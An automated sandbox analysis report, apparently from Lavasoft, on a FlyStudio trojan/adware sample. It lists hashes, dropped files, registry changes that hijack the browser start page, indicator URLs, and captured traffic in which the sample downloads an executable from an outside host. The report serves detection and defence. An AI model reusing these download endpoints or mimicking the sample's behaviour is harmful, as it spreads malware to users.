Trojan.Win32.FlyStudio_ad79dc900c
not-a-virus:AdWare.Win32.AdLoad.aafqp (Kaspersky), Artemis!AD79DC900C0F (McAfee), ML.Attribute.HighConfidence (Symantec), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: ad79dc900c0fc342983863657e0b003b
SHA1: 2fd88d33eebffe62c2affd56c7d9e611badde530
SHA256: 27b9ed6e179982bf46db0c7016068bca6ff1e6d7b4b4e1fb28fdda56aa1db694
SSDeep: 12288:8GGD0VMJBLA0SLg52v00Vrx8SsiOStlLppZoU7Q1AVtKINNbhbSmobsw9Pen5Iru:8TDW0MDv0mtFOY5pnoUAsNNbdTFwHreF
Size: 584192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Mail.Ru
Created at: 2017-04-03 14:55:16
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
hao123.exe:3776
The Trojan injects its code into the following process(es):
%original file name%.exe:3676
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\hao123\config.ini (36 bytes)
C:\Users\"%CurrentUserName%"\Desktop\hao123导航.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\hao123\hao123.exe (1561 bytes)
Registry activity
The process hao123.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?k5209809"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\ad79dc900c0fc342983863657e0b003b_RASAPI32]
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| a4df5aa48eaa0eaca060773f8ce1949e | c:\Users\"%CurrentUserName%"\AppData\Local\hao123\hao123.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: ?????
Product Name: ??????3????
Product Version: 1.0.0.0
Legal Copyright: [?????] ???? 2012 - 2017
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ??????3????..
Comments: ??????3????
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 1339392 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 1343488 | 573440 | 572416 | 5.50129 | d193fa217090632beb4e2f3f7d911d3f |
| .rsrc | 1916928 | 12288 | 10752 | 3.62022 | 2766a35487550b191a0a29eb5c8b29cb |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://down.ku122.com/272330304352327324266257270374320302.txt | |
| hxxp://down.ku122.com/ | |
| hxxp://down.ku122.com/favicon.ico | |
| hxxp://www.2345.com/?k5209809 | |
| hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= | |
| hxxp://cdn.globalsigncdn.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH | |
| hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ== | |
| hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ== | |
| hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= | |
| hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= | |
| hxxp://down.ku122.com/download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe | |
| hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w== | |
| hxxp://ocsp-services.uzto.netdna-cdn.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEQCTkoVAAWVxX5R/KI/vyZso | |
| hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl | |
| hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl | |
| hxxp://subca.ocsp-certum.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEQCTkoVAAWVxX5R/KI/vyZso | |
| hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ== | |
| hxxp://ocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH | |
| hxxp://www.ku122.com/ | |
| hxxp://www.ku122.com/favicon.ico | |
| hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= | |
| hxxp://down.ku122.com/.............txt | |
| hxxp://ss.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= | |
| hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ== | |
| hxxp://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= | |
| hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w== | |
| cpro.baidustatic.com | |
| datax.baidu.com | |
| opehs.tanx.com | |
| hs.qhupdate.com | |
| pos.baidu.com | |
| atanx.alicdn.com | |
| wn.pos.baidu.com | |
| tianqi.2345.com | |
| hm.baidu.com | |
| phs.tanx.com | |
| guess.union2.50bang.org | |
| union2.50bang.org |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= HTTP/1.1
Cache-Control: max-age = 363986
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 17 Nov 2013 16:06:48 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1454
content-transfer-encoding: binary
Cache-Control: max-age=418698, public, no-transform, must-revalidate
Last-Modified: Fri, 21 Apr 2017 22:02:17 GMT
Expires: Fri, 28 Apr 2017 22:02:17 GMT
Date: Mon, 24 Apr 2017 01:45:43 GMT
Connection: keep-alive
GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH HTTP/1.1
Cache-Control: max-age = 10800
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 07:50:34 GMT
If-None-Match: "6b9ba9eca642c891cc02365fc6161341647bd9fc"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:30 GMT
Content-Type: application/ocsp-response
Content-Length: 1518
Connection: keep-alive
Set-Cookie: __cfduid=d18ca84a76b32c566a402811fe02416d51492998330; expires=Tue, 24-Apr-18 01:45:30 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sun, 23 Apr 2017 23:57:25 GMT
Expires: Thu, 27 Apr 2017 23:57:25 GMT
ETag: "c928e2d374665088a12ae522bef2636fe56a734c"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 3545622f269b4ea8-DME
GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1
Host: down.ku122.com
Accept: */*
Referer: hXXp://down.ku122.com/download/2345
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=43077222-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT
Accept-Ranges: bytes
ETag: "57869c6aa43d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:45:47 GMT
Connection: close
Content-Length: 64615834
Content-Range: bytes 43077222-107693055/107693056
GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEQCTkoVAAWVxX5R/KI/vyZso HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: subca.ocsp-certum.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:49 GMT
Content-Type: application/ocsp-response
Content-Length: 1657
Connection: keep-alive
Content-transfer-encoding: binary
X-Cached: MISS
Server: NetDNA-cache/2.2
X-Cache: HIT
GET /.............txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: down.ku122.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 17 Mar 2017 03:37:17 GMT
Accept-Ranges: bytes
ETag: "a3a598c6cf9ed21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:44:46 GMT
Content-Length: 4239
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ss.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1609
content-transfer-encoding: binary
Cache-Control: max-age=417137, public, no-transform, must-revalidate
Last-Modified: Fri, 21 Apr 2017 21:36:43 GMT
Expires: Fri, 28 Apr 2017 21:36:43 GMT
Date: Mon, 24 Apr 2017 01:45:49 GMT
Connection: keep-alive
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: VVV.ku122.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:45:00 GMT
Content-Length: 1163
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECECUM6OAwYS6fK4n3BU18+P0= HTTP/1.1
Cache-Control: max-age = 418698
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 21 Apr 2017 22:02:17 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 304 Not Modified
Content-Type: application/ocsp-response
Expires: Fri, 28 Apr 2017 22:02:17 GMT
Last-Modified: Fri, 21 Apr 2017 22:02:17 GMT
Cache-Control: max-age=418698, public, no-transform, must-revalidate
Date: Mon, 24 Apr 2017 01:45:49 GMT
Connection: keep-alive
GET /CRL/Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT
If-None-Match: "200da-5b6-4eb453c33260e"
User-Agent: Microsoft-CryptoAPI/6.1
Host: cdp1.public-trust.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-pkcs7-crl
Date: Mon, 24 Apr 2017 01:45:50 GMT
Etag: "200c0-d9f-54ce6d01eb69d"
Last-Modified: Tue, 11 Apr 2017 16:45:01 GMT
Server: ECS (fcn/418B)
X-Cache: HIT
Content-Length: 34870
GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1
Host: down.ku122.com
Accept: */*
Referer: hXXp://down.ku122.com/download/2345
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT
Accept-Ranges: bytes
ETag: "57869c6aa43d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:45:47 GMT
Connection: close
Content-Length: 107693056
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ss.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1609
content-transfer-encoding: binary
Cache-Control: max-age=417137, public, no-transform, must-revalidate
Last-Modified: Fri, 21 Apr 2017 21:36:43 GMT
Expires: Fri, 28 Apr 2017 21:36:43 GMT
Date: Mon, 24 Apr 2017 01:45:49 GMT
Connection: keep-alive0..E......>0..:.. .....0..... 0..'0......E ....e.u.....x..7....2017
0421213643Z0s0q0I0... ..........d.....k... P.....d.._`.a.U..C..`*..z.C
....S.=......UMO4.O.....20170421213643Z....20170428213643Z0...*.H.....
........L.0....."......!.;[..8.Sa. D.......T.....F.g.....c.Hh_b"..LY .
..f<z.\...k.xG./J.r.i..K.T.8..Z..Q....].QT%9.....-R..4...V.|....f..
...;.....&..|....cW~.[O)..>..j7B..S.'VJ<6q....nG~.S.....z......`
tXU......HtBv.....8.<........\CMO.......a.?y......^.5U.......g)...n
0..j0..f0..N.......Dh.ciH.........!0...*.H........0~1.0...U....US1.0..
.U....Symantec Corporation1.0...U....Symantec Trust Network1/0-..U...&
Symantec Class 3 Secure Server CA - G40...170204000000Z..170505235959Z
0@1>0<..U...5Symantec Class 3 Secure Server CA - G4 OCSP Respond
er0.."0...*.H.............0......... B.}.@...E2.......&kg.#.c..7f#0...
.!....Z.G..|.o..W{2.m.l.cM...%......V.Wx6I.t....Q,U^......;.U<ie...
X.{.6. .4...ep....q..OuV...F...s.f....!....K....O....Oj.?Yd6^Mlw.6.k..
*./.......b..Q4...H.s.........(...toW...9...............&...D...{T{...
.....4.;/pa<...........0...0... .....0......0"..U....0...0.1.0...U.
...TGV-D-38570...U.#..0..._`.a.U..C..`*..z.C..0...U......E ....e.u....
.x..7..0...U.......0.0n..U. .g0e0c..`.H...E....0T0&.. .........hXXp://
VVV.symauth.com/cps0*.. .......0... hXXp://VVV.symauth.com/rpa0...U.%
..0... .......0...U...........0...*.H.............x..b5XG.........T^2.
....T..............zq.............f....#|.....P...R.....]...la.(.21{..
.C.....K.....R..H.b....3L..52}5.8.......%.......l=..$X$_..01.3....<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFOFPQfyqanGG1VNTzSRTwc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ss.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1609
content-transfer-encoding: binary
Cache-Control: max-age=417137, public, no-transform, must-revalidate
Last-Modified: Fri, 21 Apr 2017 21:36:43 GMT
Expires: Fri, 28 Apr 2017 21:36:43 GMT
Date: Mon, 24 Apr 2017 01:45:49 GMT
Connection: keep-alive0..E......>0..:.. .....0..... 0..'0......E ....e.u.....x..7....2017
0421213643Z0s0q0I0... ..........d.....k... P.....d.._`.a.U..C..`*..z.C
....S.=......UMO4.O.....20170421213643Z....20170428213643Z0...*.H.....
........L.0....."......!.;[..8.Sa. D.......T.....F.g.....c.Hh_b"..LY .
..f<z.\...k.xG./J.r.i..K.T.8..Z..Q....].QT%9.....-R..4...V.|....f..
...;.....&..|....cW~.[O)..>..j7B..S.'VJ<6q....nG~.S.....z......`
tXU......HtBv.....8.<........\CMO.......a.?y......^.5U.......g)...n
0..j0..f0..N.......Dh.ciH.........!0...*.H........0~1.0...U....US1.0..
.U....Symantec Corporation1.0...U....Symantec Trust Network1/0-..U...&
Symantec Class 3 Secure Server CA - G40...170204000000Z..170505235959Z
0@1>0<..U...5Symantec Class 3 Secure Server CA - G4 OCSP Respond
er0.."0...*.H.............0......... B.}.@...E2.......&kg.#.c..7f#0...
.!....Z.G..|.o..W{2.m.l.cM...%......V.Wx6I.t....Q,U^......;.U<ie...
X.{.6. .4...ep....q..OuV...F...s.f....!....K....O....Oj.?Yd6^Mlw.6.k..
*./.......b..Q4...H.s.........(...toW...9...............&...D...{T{...
.....4.;/pa<...........0...0... .....0......0"..U....0...0.1.0...U.
...TGV-D-38570...U.#..0..._`.a.U..C..`*..z.C..0...U......E ....e.u....
.x..7..0...U.......0.0n..U. .g0e0c..`.H...E....0T0&.. .........hXXp://
VVV.symauth.com/cps0*.. .......0... hXXp://VVV.symauth.com/rpa0...U.%
..0... .......0...U...........0...*.H.............x..b5XG.........T^2.
....T..............zq.............f....#|.....P...R.....]...la.(.21{..
.C.....K.....R..H.b....3L..52}5.8.......%.......l=..$X$_..01.3....<<< skipped >>>
GET /?k5209809 HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Referer: hXXp://VVV.ku122.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.2345.com
Connection: Keep-Alive
HTTP/1.1 302 Temporarily Moved
Location: hXXps://VVV.2345.com/?k5209809
Accept-Ranges: bytes
Date: Mon, 24 Apr 2017 01:45:07 GMT
Age: 0
Connection: close
x-hits: 0
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:36 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d87558bb0b78daf61edd900dfd3e337661492998336; expires=Tue, 24-Apr-18 01:45:36 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sun, 23 Apr 2017 22:21:57 GMT
Expires: Thu, 27 Apr 2017 22:21:57 GMT
ETag: "4d85c93097530c8a95e29e6ae26f53ce0f5c35b3"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 35456250f68a4eea-DME0..........0..... .....0......0...0.......M........u....%...G..2017042
3222157Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.&..)...x........20170423222157Z....20170427222157Z0...*.H............
.{j...TZ....>...H.]t.0^)Z?..3.......v.[...<o"9].y.1...D .Y.....k
jv...!e.K..k..p..~a|...=...F.]Uh...9 ..f!.....Z.]..n...<]......2W@.
....)9o...7I...;#..>.....q-.Y8.X....a...j...Sa....RLr2......9.qx...
....gY..........\/(.l.........o6..C.D.<*&..X8vhX;.I...........K0..G
0..C0.. .......o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....Gl
obalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SH
A256 - G20...170213071103Z..170516071103Z0..1.0...U....BE1.0...U....Gl
obalSign nv-sa1.0...U....2017021315051M0K..U...DGlobalSign Organizatio
n Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............
0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k...
....D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V
...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m
..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a......
..0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0
... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.gl
obalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..
............=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...
&..%....2...4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y.
..".2b....~...........E..U_..Y[....b.G'}..^-.....:.mo......=......<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:43 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d283bc54d4c5552efdeb8da9d437295161492998343; expires=Tue, 24-Apr-18 01:45:43 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Mon, 24 Apr 2017 00:37:42 GMT
Expires: Fri, 28 Apr 2017 00:37:42 GMT
ETag: "4fadf1178a8b6c14524f2bbe490f7f182022faab"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 3545627f41d04eea-DME0..........0..... .....0......0...0.......M........u....%...G..2017042
4003742Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.9.!..N...=......20170424003742Z....20170428003742Z0...*.H............
.d.....A:B/........;u....-h./.Az..W..7D..}....n.........."n!.4.s.j....
yCONa.kLB.=.E.r..z.'.........'.4.PG..<j.............R4%.....G...V..
...&.7b..^F.Z..2....N.{[..E.S@..Cp...m6..C..bB.......i.HC=.1....a.'.c)
5....-......9=W....(2\6V.....cHmTZB.k.........Q.3....K0..G0..C0.. ....
...o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-
sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20..
.170213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-
sa1.0...U....2017021315051M0K..U...DGlobalSign Organization Validation
CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C.
.0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.......
..u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V
..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~
..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U..
.....M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0..
....0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com
/repository/0...U...........0...U.%..0... .......0...*.H..............
=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...
4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~.
..........E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....N<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
